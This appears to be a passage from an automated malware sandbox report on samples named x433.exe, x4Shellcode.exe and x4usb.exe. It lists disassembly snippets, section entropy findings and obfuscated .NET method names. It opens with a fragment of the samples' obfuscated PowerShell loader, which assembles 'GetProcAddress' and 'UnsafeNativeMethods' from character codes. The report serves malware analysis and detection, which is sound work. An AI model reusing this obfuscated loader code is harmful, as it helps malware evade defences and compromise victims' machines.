$_.Location.Split('\')[-1].Equals('Sy'+[Char](115)+''+[Char](116)+''+'e'+'m.'+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+'r'+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+'f'+'t.Wi'+[Char](110)+'32.'+'U'+''+[Char](110)+''+'s'+'a'+[Char](102)+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+'v'+''+[Char](101)+''+'M'+'eth'+'o'+''+[Char](100)+''+'s'+'');$VrBFKSFCQkTmpL=$GGVrSjgYYZyVF.GetMethod(''+'G'+''+[Char](101)+'tPr'+[Char](111)+''+[Char](99)+''+[Char](65)+''+[Char](100)+'d'+[Char](114)+''+[Char](101)+'s'+'s'+''
Source: C:\Users\user\Desktop\x433.exe Code function: 0_2_00007FFD9B8900BD pushad ; iretd 0_2_00007FFD9B8900C1
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_0042E00A push ds; ret 1_2_0042E010
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_0042D0B0 push ds; ret 1_2_0042D0B1
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_0042F161 push 100077DBh; ret 1_2_0042F16B
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_0042D17B push cs; ret 1_2_0042D17C
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_0042A34B push esi; iretd 1_2_0042A34C
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_0078CBD0 push 0078C329h; ret 1_2_0078BFF5
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_0078CBD0 push 0078C05Bh; ret 1_2_0078C0AF
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_0078CBD0 push 0078C416h; ret 1_2_0078C14F
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_0078CBD0 push 0078C6BEh; ret 1_2_0078C196
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_0078CBD0 push 0078C439h; ret 1_2_0078C1AC
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_0078CBD0 push 0078C599h; ret 1_2_0078C1E3
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_0078CBD0 push 0078C471h; ret 1_2_0078C1FB
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_0078CBD0 push 0078BECFh; ret 1_2_0078C2FC
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_0078CBD0 push 0078C6CDh; ret 1_2_0078C390
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_0078CBD0 push 0078C2FFh; ret 1_2_0078C3AE
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_0078CBD0 push 0078C532h; ret 1_2_0078C45A
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_0078CBD0 push 0078C23Ch; ret 1_2_0078C597
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_0078CBD0 push 0078C08Dh; ret 1_2_0078C639
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_0078CBD0 push 0078C63Eh; ret 1_2_0078C67B
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_0078CBD0 push 0078C198h; ret 1_2_0078C72A
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_0078CBD0 push 0078CC2Ch; ret 1_2_0078CBE3
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_0078CBD0 push 0078CBFEh; ret 1_2_0078CC1D
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_0078CBD0 push 0078CBE6h; ret 1_2_0078CC40
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_00788550 push 0078852Eh; ret 1_2_00787F3A
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_00788550 push 00788514h; ret 1_2_00787F66
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_00788550 push 00787E66h; ret 1_2_00788057
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_00788550 push 0078817Ah; ret 1_2_0078808B
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_00788550 push 007882E5h; ret 1_2_007880D9
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_00788550 push 0078826Ah; ret 1_2_0078819E
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_00788550 push 0078849Ch; ret 1_2_007881E4
Source: x433.exe Static PE information: section name: .text entropy: 7.996675267651461
Source: x4Shellcode.exe.0.dr Static PE information: section name: .reloc entropy: 7.935386017883638
Source: x4host.exe.0.dr, xfwOCj1PDUkyxHJ.cs High entropy of concatenated method names: 'reqGHXI3G9wXso5', 'A3d5XBF2z5oVzdx', 'eM62vnBwLjHrGH0', 'a26UulBrBUIfuU8QpVdSBT5Y3', 'YnSkjpcwirB2DXcYUxXJJeLWI', 'ixkWVXbVwenR10cANu7dJKP7g', 'mYx4myPdes6v7IW2guHXEk0XM', 'USsEupRWAqKevrdsDYC30x7bu', '_6XZAKoQQgtBVHjhY9SsBP8xLt', 'vZHNXXe8F6yEh1yOyQfUiLBS9'
Source: x4host.exe.0.dr, hOxzwpfm6coo0sFoeslkbZMZZb7K7qrd76lD9A2OOjokqoisweTmVdQnNUqdyCf5emVzmT0qOk8yGIDulWDAfZT1.cs High entropy of concatenated method names: 'rWnjj3kE8i3rPLazoNf2St5AvccdZSJzR', 'sK0plnUhQjmhNNHfuS67N2yUQVQz4JiDZ', '_53WT8ngowxa7xthsXFFK8XeCjlHGk5Xmj', 'QD4jyzyxsnE0p6sTm96SrGfkWZdAoVoIk'
Source: x4host.exe.0.dr, oqXYL7IBPbaOrkCLfAY49RFSxlJrU3xfS77bdqqQ5SraRAZwMVptFdt.cs High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', '_1pKE2dRjC82lv6NlWDIGaThfWYlfx4Vo4', 'mTqpVonBrB3IDzdoyAwNFf98atXrckdFf', 'PQAExrLV3pDxmbwvvKsu4AWoINLVIjAvI', 'XPSWdY17exp3KlEhvfjyng5wzdFRgqDIo'
Source: x4host.exe.0.dr, ep6wttCf2TiLTQ7SU0ji7DL4Gw31u1.cs High entropy of concatenated method names: '_9KmzWj2mwalDOEBlyNP2RUmHGVJB0Z', 'oNXUpbPnIS5Rns1h69KZvbAfoRftvh', '_4jJu4Ia8z76oSV28Fbxqh2YxmM07G3', 'riqvGqOv1KqQr5kNYYUa2zhmrrkhvN', 'X1OxpIzLyhBl4TmbQKUQPdwhwgIGFJ', '_4kYSuRCBtXmtF4hZe7PcbiBTtCaVIg', '_45JikAg8ztoISYnTCTSKoerahn7Fh8', 'ftJZQZj46Ym8TmBooihlwWVW6mc6Qs', '_4mwLd6KxylnKnpZdEn9yb2RylClmkg', '_43NfPF5LUzaG2UCFRfZoKd43V2Y71J'
Source: x4host.exe.0.dr, etNX0TntxxQcULpBdpvLQMPzQQj7vk.cs High entropy of concatenated method names: 'E6lcacwk2Om4Jre8Zxlnx2uuwE3DSa', 'nEAfdyNliOQh4RbARZ4Mjrvp3lU9pw', 'H8c3AG7ObEKhDaQZQGLQNSaeOEF1MJ', 'CPxSbcTtcwCHCECL8MoBfAM4Ty8FRv', 'hbFWqMrhwX3iTTU', 'F2nHLZLu6dLkjSs', 'ozzr0SK9SyLkHPg', 'fIUf7QsKIygwHOo', '_6ZiCijBXyYwGoVC', 'dRhGyU4nmdwkQ0r'
Source: x4host.exe.0.dr, EndO8ud7oLHcucMOjPbPQqoqz2hrsI.cs High entropy of concatenated method names: 'MuXxwXMdWpj7xWfZCFLL3ajC86y3HE', 'Zqmy8YoOiD6vkJ4QUa6qotcMjyzvtw', 'GDO8A3hX6t4WEqwjwDmkN9QX1di8dA', '_5r19egLavdE3pWQeJ25pnksK8bXRUF', 'hTZmQb61o9zj5OrkvKSmDe6Dn0YcwV', '_8ZLzAgSEWrGxT2bsbvXNRGhoqnDFts', 'COTHbvM7SEhrqKoXNPnzOeAV5YgdKV', 'Jz8IH3YoK4J9mxv3FUpFYpuTYdowWR', 'TBxbKfZSmgHZ9whZ3JbDGlqvOrEfna', 'MhOzbgjjU4AbicRDgrjOYm29se7kjw'
Source: x4host.exe.0.dr, 2GeJGBZ9s7f00k3MrIG6jUSZ27JzDpdLtJapZiFUDiIPvwDFAaMrisXFq17tsOrZFaIFb6cVJvf4N9MUGa9BFHlG.cs High entropy of concatenated method names: 'z1LzC6OirZQYgRajqkXBhte5gh9cv4LgGo3P1E2BJiHNBuOSiZJigIuiAkPFEDHCDVm4JYf9fwPOeIqIlhVif8jd', 'HCuQxWK61KjHlQFB3M0c4VHJAaL6HrtPZDHGB8NaNSZq6UkCD0sKzCXaSPWKon2xn7FWCpURH9umJNAI5wdFooOO', '_1WMMCf1RCWPIZjJAw5BK2pk7i0eukKPmEt4AeDUNcJ7JnLAVp1iAzXJuj91qkclSY3GnfmyL5AV9RiknQciWCej7', 'WakgiKHdUOu78VuIIKHZ8zGfJ34jFVbA1LIqQTZlGEjfUnSEU8p85cj0GZzXVZeDdbSRPUcLb8ClWbJM4VPmJ9iw', 'kYkGiTHBpkN4O55gQqmuNZa55cxWW239wKIErOIZL2UdORA3BMlJ9P29ysS8z4uHaz3WQqkwgNodyhcstP3NBaw9', 'AWq5zbRm4tFVd34LPvDKiiEM3AMmOYr01Yx2btbKOEixxWORG3DLG2pPf3JPv1GnhTWTIc3QTE7RxXDDqSUoq2sB', 'ErFN0wMw3jBZKG8RpL7gOeUUeMzXUQeuP98eTqAgR5mYRoGPnH45UPYSv89wOFV2THc6uSTjPClTbRCnZ7Qz6wKk', 'q8opKTgZkDsYXfN2NJLUEevH0yTqFb4r5IsoBmPy5iYX6ajuruWSA6kC40jSandPrrkT8GIPykkQciP4NE9snONl', 'UfyPTB51UMnUJ4m08aCQ5xJbrmtLG4', 'zoFPojQVB5ILw3JamQNmwW2ZDKvWyA'
Source: x4host.exe.0.dr, vthpzjkPbD10MqQvse8d9fgJdMuC69.cs High entropy of concatenated method names: '_4FWlZlOv9mJvgefZ0oZnm4oehhLgu7', 'lnELcVdQS1KjcheIGYrB4ncZtrtGJ1', 'khljFe8k3eynRCcPUrTtQcLDJSfYdW', '_3pHprr9Uje78hOKmIDBwm74LcLR0gf', 'Y5J6lR8AXCpHirkDqZHu1AxA9OvKJbnJTugtJarDfVGeTU8peTob1op3HF6Nhe5YT0xNJjLPbNs6oEbgQGPe4LnhRTvQboc6N', 'bhaqJNHS2LH8epigaJtBlgMA2LQbW4n33Lgwf215UT60eyD9EHmyNDEWkVlik8c6jEl3iOysXcy9cIlscLLrmBhYyTQgafHw7', 'TlCcWOPNdmYoiwcRNmDsu3nZpJt9JjHfl647IMjnHYXDgPBs9vDpl2W2Zi09X0tLuME6YggpUOZZKmc59tFSy73v8AaSjeH3L', '_0RTp1iMhbSwasiCO1wAvDGgmeICOBLbCdi0UHWmgt5R6ftDE92322bTynImnNZe0NJWfGFeRYjPkUaF2d2N2kyeiYXBZ0Pd2s', 'ezUslj75uOCTADP6qP5EUIYwDx51Bo18aSlvhYg0ygBxP6fectATG16mbwziR5jIer6tycwZJOVw5TpWpnGDNwIfVzn5lAWLE', 'K6HJdPff3bNq0gfmsoCxocbF6Eyi361PVuyR3ArlJfkLRsWX9RI9Q9SiBYnuSiLG69BuhvE23aOFXboZJNozy7lvQoyJGQ84q'
Source: x4host.exe.0.dr, KgvNpQFD1pgyslmvoLVzYtqStdU0vY.cs High entropy of concatenated method names: '_8OqKNdBpQOiP48byjobgpYdKjvomXU', 'bSMJ4wPTjULuRIGy20UVskepWllP8tk4XXKMa9hhWQ4xSP9EjJMUqTPO4upHSn5rtUuCwfq9Gr4oZSRYZE5uKPuqxQKdonuya', 'wKT6cqounpHYRYFCkj4gBtSbVwIDF60ELB01T92h8bh6mYlu0i92K6L8ZXsf4XHyaAi0s6qGfXrcIK6okzaEJXTR1NZBhKKJ3', 'FQKjPf2hqoC1UlXmUSQMOVlJtO41IdIgkPZql4wdu4YM059Qm8JumuCUvPqQvXel1aTrhIdZcx7JdoYlxAavrNAiKQ4Cqx3a6', 'p2o0lampFTBN00Sl2Ly0kao2KUg8HEgfgNWBsGWwrRNVRf3xcSm1prkmpTZ37cJnWU6TxDbV3JzbDLvYcTDQMtw0REG1BG3Eo'
Source: x4host.exe.0.dr, EnDrnZVI21QanoXDv7V6tpRAyEeGc3.cs High entropy of concatenated method names: 'OJnYUbLkwSxKjmU6fKV2Hlw1IQDrrJ', 'tvU9fWfrnnauFESq3CZMjJqgWzCcQiVr8uOuybtYGmaAmLPTrBRbSmpeagqUwJ0IALVMMAlEq32BxT15HJetiYKVXqlBwiRN1', 'k27RKeDihzBbcaefRpL4TKPMWxclxn8k5c0RxZP7mcnpWucKutGtmjKZrYx20HvHIzkMsxzKuui79OmMLiSyzphYgEiKf93jl', 'Kdk7fsQFZWfb1NTSDwX0JpPEu3wN1ciOsKyPwnWHaTkkzFYlgvY2wLJUeOMcOnyeSOxZT6WHdCzt3OQdLa8', 'ZNCH16SUBJBa1infvnuYgiLTJaADVvvCpDUyOhAylbPs8EBspiKDd2NBofvowFjy7xlhRV6MgZ2dosI75Nq'
Source: 0.2.x433.exe.29b77d8.1.raw.unpack, xfwOCj1PDUkyxHJ.cs High entropy of concatenated method names: 'reqGHXI3G9wXso5', 'A3d5XBF2z5oVzdx', 'eM62vnBwLjHrGH0', 'a26UulBrBUIfuU8QpVdSBT5Y3', 'YnSkjpcwirB2DXcYUxXJJeLWI', 'ixkWVXbVwenR10cANu7dJKP7g', 'mYx4myPdes6v7IW2guHXEk0XM', 'USsEupRWAqKevrdsDYC30x7bu', '_6XZAKoQQgtBVHjhY9SsBP8xLt', 'vZHNXXe8F6yEh1yOyQfUiLBS9'
Source: 0.2.x433.exe.29b77d8.1.raw.unpack, hOxzwpfm6coo0sFoeslkbZMZZb7K7qrd76lD9A2OOjokqoisweTmVdQnNUqdyCf5emVzmT0qOk8yGIDulWDAfZT1.cs High entropy of concatenated method names: 'rWnjj3kE8i3rPLazoNf2St5AvccdZSJzR', 'sK0plnUhQjmhNNHfuS67N2yUQVQz4JiDZ', '_53WT8ngowxa7xthsXFFK8XeCjlHGk5Xmj', 'QD4jyzyxsnE0p6sTm96SrGfkWZdAoVoIk'
Source: 0.2.x433.exe.29b77d8.1.raw.unpack, oqXYL7IBPbaOrkCLfAY49RFSxlJrU3xfS77bdqqQ5SraRAZwMVptFdt.cs High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', '_1pKE2dRjC82lv6NlWDIGaThfWYlfx4Vo4', 'mTqpVonBrB3IDzdoyAwNFf98atXrckdFf', 'PQAExrLV3pDxmbwvvKsu4AWoINLVIjAvI', 'XPSWdY17exp3KlEhvfjyng5wzdFRgqDIo'
Source: 0.2.x433.exe.29b77d8.1.raw.unpack, ep6wttCf2TiLTQ7SU0ji7DL4Gw31u1.cs High entropy of concatenated method names: '_9KmzWj2mwalDOEBlyNP2RUmHGVJB0Z', 'oNXUpbPnIS5Rns1h69KZvbAfoRftvh', '_4jJu4Ia8z76oSV28Fbxqh2YxmM07G3', 'riqvGqOv1KqQr5kNYYUa2zhmrrkhvN', 'X1OxpIzLyhBl4TmbQKUQPdwhwgIGFJ', '_4kYSuRCBtXmtF4hZe7PcbiBTtCaVIg', '_45JikAg8ztoISYnTCTSKoerahn7Fh8', 'ftJZQZj46Ym8TmBooihlwWVW6mc6Qs', '_4mwLd6KxylnKnpZdEn9yb2RylClmkg', '_43NfPF5LUzaG2UCFRfZoKd43V2Y71J'
Source: 0.2.x433.exe.29b77d8.1.raw.unpack, etNX0TntxxQcULpBdpvLQMPzQQj7vk.cs High entropy of concatenated method names: 'E6lcacwk2Om4Jre8Zxlnx2uuwE3DSa', 'nEAfdyNliOQh4RbARZ4Mjrvp3lU9pw', 'H8c3AG7ObEKhDaQZQGLQNSaeOEF1MJ', 'CPxSbcTtcwCHCECL8MoBfAM4Ty8FRv', 'hbFWqMrhwX3iTTU', 'F2nHLZLu6dLkjSs', 'ozzr0SK9SyLkHPg', 'fIUf7QsKIygwHOo', '_6ZiCijBXyYwGoVC', 'dRhGyU4nmdwkQ0r'
Source: 0.2.x433.exe.29b77d8.1.raw.unpack, EndO8ud7oLHcucMOjPbPQqoqz2hrsI.cs High entropy of concatenated method names: 'MuXxwXMdWpj7xWfZCFLL3ajC86y3HE', 'Zqmy8YoOiD6vkJ4QUa6qotcMjyzvtw', 'GDO8A3hX6t4WEqwjwDmkN9QX1di8dA', '_5r19egLavdE3pWQeJ25pnksK8bXRUF', 'hTZmQb61o9zj5OrkvKSmDe6Dn0YcwV', '_8ZLzAgSEWrGxT2bsbvXNRGhoqnDFts', 'COTHbvM7SEhrqKoXNPnzOeAV5YgdKV', 'Jz8IH3YoK4J9mxv3FUpFYpuTYdowWR', 'TBxbKfZSmgHZ9whZ3JbDGlqvOrEfna', 'MhOzbgjjU4AbicRDgrjOYm29se7kjw'
Source: 0.2.x433.exe.29b77d8.1.raw.unpack, 2GeJGBZ9s7f00k3MrIG6jUSZ27JzDpdLtJapZiFUDiIPvwDFAaMrisXFq17tsOrZFaIFb6cVJvf4N9MUGa9BFHlG.cs High entropy of concatenated method names: 'z1LzC6OirZQYgRajqkXBhte5gh9cv4LgGo3P1E2BJiHNBuOSiZJigIuiAkPFEDHCDVm4JYf9fwPOeIqIlhVif8jd', 'HCuQxWK61KjHlQFB3M0c4VHJAaL6HrtPZDHGB8NaNSZq6UkCD0sKzCXaSPWKon2xn7FWCpURH9umJNAI5wdFooOO', '_1WMMCf1RCWPIZjJAw5BK2pk7i0eukKPmEt4AeDUNcJ7JnLAVp1iAzXJuj91qkclSY3GnfmyL5AV9RiknQciWCej7', 'WakgiKHdUOu78VuIIKHZ8zGfJ34jFVbA1LIqQTZlGEjfUnSEU8p85cj0GZzXVZeDdbSRPUcLb8ClWbJM4VPmJ9iw', 'kYkGiTHBpkN4O55gQqmuNZa55cxWW239wKIErOIZL2UdORA3BMlJ9P29ysS8z4uHaz3WQqkwgNodyhcstP3NBaw9', 'AWq5zbRm4tFVd34LPvDKiiEM3AMmOYr01Yx2btbKOEixxWORG3DLG2pPf3JPv1GnhTWTIc3QTE7RxXDDqSUoq2sB', 'ErFN0wMw3jBZKG8RpL7gOeUUeMzXUQeuP98eTqAgR5mYRoGPnH45UPYSv89wOFV2THc6uSTjPClTbRCnZ7Qz6wKk', 'q8opKTgZkDsYXfN2NJLUEevH0yTqFb4r5IsoBmPy5iYX6ajuruWSA6kC40jSandPrrkT8GIPykkQciP4NE9snONl', 'UfyPTB51UMnUJ4m08aCQ5xJbrmtLG4', 'zoFPojQVB5ILw3JamQNmwW2ZDKvWyA'
Source: 0.2.x433.exe.29b77d8.1.raw.unpack, vthpzjkPbD10MqQvse8d9fgJdMuC69.cs High entropy of concatenated method names: '_4FWlZlOv9mJvgefZ0oZnm4oehhLgu7', 'lnELcVdQS1KjcheIGYrB4ncZtrtGJ1', 'khljFe8k3eynRCcPUrTtQcLDJSfYdW', '_3pHprr9Uje78hOKmIDBwm74LcLR0gf', 'Y5J6lR8AXCpHirkDqZHu1AxA9OvKJbnJTugtJarDfVGeTU8peTob1op3HF6Nhe5YT0xNJjLPbNs6oEbgQGPe4LnhRTvQboc6N', 'bhaqJNHS2LH8epigaJtBlgMA2LQbW4n33Lgwf215UT60eyD9EHmyNDEWkVlik8c6jEl3iOysXcy9cIlscLLrmBhYyTQgafHw7', 'TlCcWOPNdmYoiwcRNmDsu3nZpJt9JjHfl647IMjnHYXDgPBs9vDpl2W2Zi09X0tLuME6YggpUOZZKmc59tFSy73v8AaSjeH3L', '_0RTp1iMhbSwasiCO1wAvDGgmeICOBLbCdi0UHWmgt5R6ftDE92322bTynImnNZe0NJWfGFeRYjPkUaF2d2N2kyeiYXBZ0Pd2s', 'ezUslj75uOCTADP6qP5EUIYwDx51Bo18aSlvhYg0ygBxP6fectATG16mbwziR5jIer6tycwZJOVw5TpWpnGDNwIfVzn5lAWLE', 'K6HJdPff3bNq0gfmsoCxocbF6Eyi361PVuyR3ArlJfkLRsWX9RI9Q9SiBYnuSiLG69BuhvE23aOFXboZJNozy7lvQoyJGQ84q'
Source: 0.2.x433.exe.29b77d8.1.raw.unpack, KgvNpQFD1pgyslmvoLVzYtqStdU0vY.cs High entropy of concatenated method names: '_8OqKNdBpQOiP48byjobgpYdKjvomXU', 'bSMJ4wPTjULuRIGy20UVskepWllP8tk4XXKMa9hhWQ4xSP9EjJMUqTPO4upHSn5rtUuCwfq9Gr4oZSRYZE5uKPuqxQKdonuya', 'wKT6cqounpHYRYFCkj4gBtSbVwIDF60ELB01T92h8bh6mYlu0i92K6L8ZXsf4XHyaAi0s6qGfXrcIK6okzaEJXTR1NZBhKKJ3', 'FQKjPf2hqoC1UlXmUSQMOVlJtO41IdIgkPZql4wdu4YM059Qm8JumuCUvPqQvXel1aTrhIdZcx7JdoYlxAavrNAiKQ4Cqx3a6', 'p2o0lampFTBN00Sl2Ly0kao2KUg8HEgfgNWBsGWwrRNVRf3xcSm1prkmpTZ37cJnWU6TxDbV3JzbDLvYcTDQMtw0REG1BG3Eo'
Source: 0.2.x433.exe.29b77d8.1.raw.unpack, EnDrnZVI21QanoXDv7V6tpRAyEeGc3.cs High entropy of concatenated method names: 'OJnYUbLkwSxKjmU6fKV2Hlw1IQDrrJ', 'tvU9fWfrnnauFESq3CZMjJqgWzCcQiVr8uOuybtYGmaAmLPTrBRbSmpeagqUwJ0IALVMMAlEq32BxT15HJetiYKVXqlBwiRN1', 'k27RKeDihzBbcaefRpL4TKPMWxclxn8k5c0RxZP7mcnpWucKutGtmjKZrYx20HvHIzkMsxzKuui79OmMLiSyzphYgEiKf93jl', 'Kdk7fsQFZWfb1NTSDwX0JpPEu3wN1ciOsKyPwnWHaTkkzFYlgvY2wLJUeOMcOnyeSOxZT6WHdCzt3OQdLa8', 'ZNCH16SUBJBa1infvnuYgiLTJaADVvvCpDUyOhAylbPs8EBspiKDd2NBofvowFjy7xlhRV6MgZ2dosI75Nq'
Source: x4usb.exe.2.dr, xfwOCj1PDUkyxHJ.cs High entropy of concatenated method names: 'reqGHXI3G9wXso5', 'A3d5XBF2z5oVzdx', 'eM62vnBwLjHrGH0', 'a26UulBrBUIfuU8QpVdSBT5Y3', 'YnSkjpcwirB2DXcYUxXJJeLWI', 'ixkWVXbVwenR10cANu7dJKP7g', 'mYx4myPdes6v7IW2guHXEk0XM', 'USsEupRWAqKevrdsDYC30x7bu', '_6XZAKoQQgtBVHjhY9SsBP8xLt', 'vZHNXXe8F6yEh1yOyQfUiLBS9'
Source: x4usb.exe.2.dr, hOxzwpfm6coo0sFoeslkbZMZZb7K7qrd76lD9A2OOjokqoisweTmVdQnNUqdyCf5emVzmT0qOk8yGIDulWDAfZT1.cs High entropy of concatenated method names: 'rWnjj3kE8i3rPLazoNf2St5AvccdZSJzR', 'sK0plnUhQjmhNNHfuS67N2yUQVQz4JiDZ', '_53WT8ngowxa7xthsXFFK8XeCjlHGk5Xmj', 'QD4jyzyxsnE0p6sTm96SrGfkWZdAoVoIk'
Source: x4usb.exe.2.dr, oqXYL7IBPbaOrkCLfAY49RFSxlJrU3xfS77bdqqQ5SraRAZwMVptFdt.cs High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', '_1pKE2dRjC82lv6NlWDIGaThfWYlfx4Vo4', 'mTqpVonBrB3IDzdoyAwNFf98atXrckdFf', 'PQAExrLV3pDxmbwvvKsu4AWoINLVIjAvI', 'XPSWdY17exp3KlEhvfjyng5wzdFRgqDIo'
Source: x4usb.exe.2.dr, ep6wttCf2TiLTQ7SU0ji7DL4Gw31u1.cs High entropy of concatenated method names: '_9KmzWj2mwalDOEBlyNP2RUmHGVJB0Z', 'oNXUpbPnIS5Rns1h69KZvbAfoRftvh', '_4jJu4Ia8z76oSV28Fbxqh2YxmM07G3', 'riqvGqOv1KqQr5kNYYUa2zhmrrkhvN', 'X1OxpIzLyhBl4TmbQKUQPdwhwgIGFJ', '_4kYSuRCBtXmtF4hZe7PcbiBTtCaVIg', '_45JikAg8ztoISYnTCTSKoerahn7Fh8', 'ftJZQZj46Ym8TmBooihlwWVW6mc6Qs', '_4mwLd6KxylnKnpZdEn9yb2RylClmkg', '_43NfPF5LUzaG2UCFRfZoKd43V2Y71J'
Source: x4usb.exe.2.dr, etNX0TntxxQcULpBdpvLQMPzQQj7vk.cs High entropy of concatenated method names: 'E6lcacwk2Om4Jre8Zxlnx2uuwE3DSa', 'nEAfdyNliOQh4RbARZ4Mjrvp3lU9pw', 'H8c3AG7ObEKhDaQZQGLQNSaeOEF1MJ', 'CPxSbcTtcwCHCECL8MoBfAM4Ty8FRv', 'hbFWqMrhwX3iTTU', 'F2nHLZLu6dLkjSs', 'ozzr0SK9SyLkHPg', 'fIUf7QsKIygwHOo', '_6ZiCijBXyYwGoVC', 'dRhGyU4nmdwkQ0r'
Source: x4usb.exe.2.dr, EndO8ud7oLHcucMOjPbPQqoqz2hrsI.cs High entropy of concatenated method names: 'MuXxwXMdWpj7xWfZCFLL3ajC86y3HE', 'Zqmy8YoOiD6vkJ4QUa6qotcMjyzvtw', 'GDO8A3hX6t4WEqwjwDmkN9QX1di8dA', '_5r19egLavdE3pWQeJ25pnksK8bXRUF', 'hTZmQb61o9zj5OrkvKSmDe6Dn0YcwV', '_8ZLzAgSEWrGxT2bsbvXNRGhoqnDFts', 'COTHbvM7SEhrqKoXNPnzOeAV5YgdKV', 'Jz8IH3YoK4J9mxv3FUpFYpuTYdowWR', 'TBxbKfZSmgHZ9whZ3JbDGlqvOrEfna', 'MhOzbgjjU4AbicRDgrjOYm29se7kjw'
Source: x4usb.exe.2.dr, 2GeJGBZ9s7f00k3MrIG6jUSZ27JzDpdLtJapZiFUDiIPvwDFAaMrisXFq17tsOrZFaIFb6cVJvf4N9MUGa9BFHlG.cs High entropy of concatenated method names: 'z1LzC6OirZQYgRajqkXBhte5gh9cv4LgGo3P1E2BJiHNBuOSiZJigIuiAkPFEDHCDVm4JYf9fwPOeIqIlhVif8jd', 'HCuQxWK61KjHlQFB3M0c4VHJAaL6HrtPZDHGB8NaNSZq6UkCD0sKzCXaSPWKon2xn7FWCpURH9umJNAI5wdFooOO', '_1WMMCf1RCWPIZjJAw5BK2pk7i0eukKPmEt4AeDUNcJ7JnLAVp1iAzXJuj91qkclSY3GnfmyL5AV9RiknQciWCej7', 'WakgiKHdUOu78VuIIKHZ8zGfJ34jFVbA1LIqQTZlGEjfUnSEU8p85cj0GZzXVZeDdbSRPUcLb8ClWbJM4VPmJ9iw', 'kYkGiTHBpkN4O55gQqmuNZa55cxWW239wKIErOIZL2UdORA3BMlJ9P29ysS8z4uHaz3WQqkwgNodyhcstP3NBaw9', 'AWq5zbRm4tFVd34LPvDKiiEM3AMmOYr01Yx2btbKOEixxWORG3DLG2pPf3JPv1GnhTWTIc3QTE7RxXDDqSUoq2sB', 'ErFN0wMw3jBZKG8RpL7gOeUUeMzXUQeuP98eTqAgR5mYRoGPnH45UPYSv89wOFV2THc6uSTjPClTbRCnZ7Qz6wKk', 'q8opKTgZkDsYXfN2NJLUEevH0yTqFb4r5IsoBmPy5iYX6ajuruWSA6kC40jSandPrrkT8GIPykkQciP4NE9snONl', 'UfyPTB51UMnUJ4m08aCQ5xJbrmtLG4', 'zoFPojQVB5ILw3JamQNmwW2ZDKvWyA'
Source: x4usb.exe.2.dr, vthpzjkPbD10MqQvse8d9fgJdMuC69.cs High entropy of concatenated method names: '_4FWlZlOv9mJvgefZ0oZnm4oehhLgu7', 'lnELcVdQS1KjcheIGYrB4ncZtrtGJ1', 'khljFe8k3eynRCcPUrTtQcLDJSfYdW', '_3pHprr9Uje78hOKmIDBwm74LcLR0gf', 'Y5J6lR8AXCpHirkDqZHu1AxA9OvKJbnJTugtJarDfVGeTU8peTob1op3HF6Nhe5YT0xNJjLPbNs6oEbgQGPe4LnhRTvQboc6N', 'bhaqJNHS2LH8epigaJtBlgMA2LQbW4n33Lgwf215UT60eyD9EHmyNDEWkVlik8c6jEl3iOysXcy9cIlscLLrmBhYyTQgafHw7', 'TlCcWOPNdmYoiwcRNmDsu3nZpJt9JjHfl647IMjnHYXDgPBs9vDpl2W2Zi09X0tLuME6YggpUOZZKmc59tFSy73v8AaSjeH3L', '_0RTp1iMhbSwasiCO1wAvDGgmeICOBLbCdi0UHWmgt5R6ftDE92322bTynImnNZe0NJWfGFeRYjPkUaF2d2N2kyeiYXBZ0Pd2s', 'ezUslj75uOCTADP6qP5EUIYwDx51Bo18aSlvhYg0ygBxP6fectATG16mbwziR5jIer6tycwZJOVw5TpWpnGDNwIfVzn5lAWLE', 'K6HJdPff3bNq0gfmsoCxocbF6Eyi361PVuyR3ArlJfkLRsWX9RI9Q9SiBYnuSiLG69BuhvE23aOFXboZJNozy7lvQoyJGQ84q'
